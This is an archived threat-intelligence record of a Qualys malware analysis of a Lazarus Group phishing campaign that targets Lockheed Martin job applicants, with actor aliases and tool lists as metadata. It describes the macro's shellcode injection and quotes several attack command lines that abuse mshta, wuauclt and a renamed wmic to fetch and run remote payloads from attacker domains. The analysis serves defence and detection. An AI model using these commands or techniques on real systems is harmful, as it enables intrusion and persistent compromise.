{
	"id": "29bac889-784e-4996-b288-fc0bdabfedee",
	"created_at": "2026-04-06T00:21:12.703597Z",
	"updated_at": "2026-04-10T03:38:20.211516Z",
	"deleted_at": null,
	"sha1_hash": "96df916bb9feecb42b5ca0ea0553aa6d3228e8c4",
	"title": "LolZarus: Lazarus Group Incorporating Lolbins into Campaigns",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1332280,
	"plain_text": "LolZarus: Lazarus Group Incorporating Lolbins into Campaigns\r\nBy Akshat Pradhan\r\nPublished: 2022-02-08 · Archived: 2026-04-05 23:13:31 UTC\r\nQualys Threat Research has identified a new Lazarus campaign using employment phishing lures targeting the defence sector. The identified variants target job applicants for Lockheed Martin. This blog details the markers of this campaign, including macro content, campaign flow and phishing themes of our identified variants and older variants that have been attributed to Lazarus by other vendors.\r\nThe Qualys Research Team recently identified a new Lazarus campaign using employment phishing lures targeting the defence sector. The identified variants target job applicants for Lockheed Martin Corporation, which is an American aerospace, arms, defence, information security, and technology corporation. This is thematically similar to other observed variants where Lazarus has posed as defence companies like Northrop Grumman and BAE Systems with job openings. We refer to this campaign as “LolZarus” due to the use of different lolbins in observed samples, some of which are the lolbin’s first recorded usage by a well-known adversary.\r\nSample Analysis\r\nWe identified two phishing documents: “Lockheed_Martin_JobOpportunities.docx” and “Salary_Lockheed_Martin_job_opportunities_confidential.doc”. Both variants were authored by the same user, named “Mickey”. The methodology used for control flow hijack and the macro content is similar across both samples.\r\nMD5: a27a9324d282d920e495832933d486ee\r\nName: Salary_Lockheed_Martin_job_opportunities_confidential.doc\r\nhttps://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns\r\nPage 1 of 8\r\nFig. 1. Lockheed Recruitment Lure\r\nThe macro uses aliases to rename the APIs that it uses (fig. 2).\r\nFig. 2. Renamed API aliases.\r\nThe initial entry point for the macro is the ActiveX Frame1_Layout handler, which runs automatically once ActiveX control is enabled (fig. 3).\r\nFig. 3. Entry point of the obfuscated macro.\r\nThe macro starts by loading WMVCORE.DLL, which is a legitimate Windows DLL for Windows Media. Interestingly, to make the macro seem more innocuous, Lazarus uses function names identical to the exported functions of WMVCORE.DLL and variable names thematically related to playback (fig. 4).\r\nFig. 4. WMV playback variables and wmvcore.dll function names.\r\nThe macro checks for a document variable before entering its main functionality block. This variable is set at the end to ensure that subsequent opening of the document does not execute it again.\r\nThe second-stage payload is shellcode embedded as a base64-encoded string array inside the macro and decoded using CryptStringToBinaryW (fig. 5). Other variants have used the UuidFromStringA function to decode the embedded payload and write it to an executable heap.\r\nFig. 5. Payload decoded via CryptStringToBinaryW.\r\nThe decoded shellcode then overwrites the WMIsAvailableOffline function from WMVCORE.dll by retrieving its address and changing its memory permissions.\r\nFig. 6. VirtualProtect and memcpy’s.\r\nThe callback to the shellcode is achieved by retrieving the KernelCallbackTable pointer from the PEB structure of the current process via NtQueryInformationProcess, and then patching the _fnDWORD pointer to point to WMIsAvailableOffline. Whenever winword makes any graphical call, the shellcode executes. This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode, such as using the function EnumSystemLocalesA as a callback to shellcode written to executable heap.\r\nThe macro then sets a document variable to ensure that subsequent runs do not execute the shellcode decode and the KernelCallbackTable hijack again. It also retrieves a decoy document from https://markettrendingcenter[.]com/lk_job_oppor[.]docx and displays it (fig. 7).\r\nFig. 7. Decoy Document.\r\nThe shellcode mainly sets up a periodic beacon out to https://markettrendingcenter[.]com/member[.]htm by creating a new staging folder C:\\WMAuthorization, writing a vbs file (WMVxEncd.vbs) to it, and creating a corresponding Scheduled task to run the vbs file every 20 minutes (fig. 8). shellObj is the Wscript.Shell object that the vbs file uses to execute the beacon command.\r\nshellObj.Run \"forfiles /p c:\\windows /m HelpPane.exe /c \"\"mshta C:\\WMAuthorization\\WMPlaybackSrv \"\"ht\r\nFig. 8. Scheduled Task Dump\r\nHere, WMPlaybackSrv is a renamed wscript.exe and WindowsMediaPlayerVxEncdSrv is a renamed mshta.exe.\r\nAnother variant of the campaign uses the lolbin wuauclt.\r\ncmd /C ''C:\\Windows\\system32\\wuauclt.exe' /UpdateDeploymentProvider wuaueng.dll /RunHandlerComServer\r\nEarlier variants have used a copy of wmic.\r\n%COMSPEC% /c Start /miN c:\\Intel\\hidasvc ENVIRONMENT get STATUS /FORMAT:”hxxps://www.advantims[.]com/\r\nAdditional vendors have also identified a variant that uses pcalua.exe.\r\nUnfortunately, we were unable to get further details about the remote htm payload as it returns a 404 error.\r\nConclusion\r\nWe attribute this campaign to Lazarus as there is significant overlap in the macro content, campaign flow, and phishing themes of our identified variants as well as older variants that have been attributed to Lazarus by other vendors. Additional vendors have reported on the current campaign while attributing it to Lazarus.\r\nLazarus continues to evolve its capabilities by utilizing lesser-known shellcode execution techniques and incorporating various lolbins as part of its campaign. Qualys will continue to monitor for other similar phishing lures related to Lazarus.\r\nExisting customers of Qualys can use the following QQLs to identify this activity:\r\nmitre.attack.technique.id:”Q0026” is\r\nmitre.attack.technique.id:”T1218.005”\r\nmitre.attack.technique.id:”T1202”\r\nmitre.attack.technique.id:”T1036.003”\r\nmitre.attack.technique.id:”T1059.005”\r\nATT\u0026CK Mapping\r\nPhishing: Spearphishing Attachment (T1566.001)\r\nWindows Management Instrumentation (T1047)\r\nMasquerading: Rename System Utilities (T1036.003)\r\nSigned Binary Proxy Execution: Mshta (T1218.005)\r\nCommand and Scripting Interpreter: Visual Basic (T1059.005)\r\nScheduled Task/Job: Scheduled Task (T1053.005)\r\nNative API (T1106)\r\nHijack Execution Flow (T1574)\r\nCommand and Scripting Interpreter: Windows Command Shell (T1059.003)\r\nIOCs\r\nHashes\r\ne87b575b2ddfb9d4d692e3b8627e3921a27a9324d282d920e495832933d486ee3f326da2affb0f7f2a4c5c95ffc660cc490c8\r\nDomains\r\nmarkettrendingcenter.com\r\nlm-career.com\r\nadvantims.com\r\nSource: https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns"
	],
	"report_names": [
		"lolzarus-lazarus-group-incorporating-lolbins-into-campaigns"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434872,
	"ts_updated_at": 1775792300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/96df916bb9feecb42b5ca0ea0553aa6d3228e8c4.pdf",
		"text": "https://archive.orkl.eu/96df916bb9feecb42b5ca0ea0553aa6d3228e8c4.txt",
		"img": "https://archive.orkl.eu/96df916bb9feecb42b5ca0ea0553aa6d3228e8c4.jpg"
	}
}